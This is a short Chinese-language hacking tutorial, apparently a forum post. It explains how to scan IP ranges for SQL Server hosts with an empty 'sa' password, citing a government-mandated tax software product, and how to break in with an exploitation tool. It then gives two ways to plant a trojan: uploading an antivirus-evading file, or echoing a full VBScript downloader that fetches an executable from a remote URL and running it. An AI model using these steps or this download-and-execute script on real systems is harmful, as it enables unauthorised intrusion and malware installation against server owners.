不要以为这个世界没有sa空口令的机器了,或许作为一个服务器的很少,但是现在很多软件都是使用sql数据库的,而软件的设计者(公司)一般都设置sql密码是空口令。最近发现某地一款政府指定使用的税务软件就是空口令,而且安装的专业人员都是这么设置的。
准备工具:WINNTAutoAttack sql综合利用工具
1:使用WINNTAutoAttack扫描sql空口令的ip,ip自己选择好了。如果RP没有问题的话,肯定会有的,只是多少的问题而已。
2:打开sql综合利用工具,填入你扫到的sa空口令的ip,其他都是默认的。
3:连接成功以后,有两个方法。
方法一:上传那里直接上传一个木马,当然不要文件太大了,最好是免杀的。然后在直接执行dos命令运行你的木马文件就行了。
方法二:在命令行echo一个down.vbs进去,down.vbs内容如下:
iLocal = LCase(WScript.Arguments(1))
iRemote = LCase(WScript.Arguments(0))
Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.Open "GET",iRemote,0
xPost.Send()
Set sGet = CreateObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile iLocal,2
echo完以后,最好type 你的文件名 看看成不成功。成功的话,c:\down.vbs http://www.sina.com/muma.exe c:\muma.exe (假设你的down.vbs放在c盘),然后直接dos下运行下载的木马就行了。 |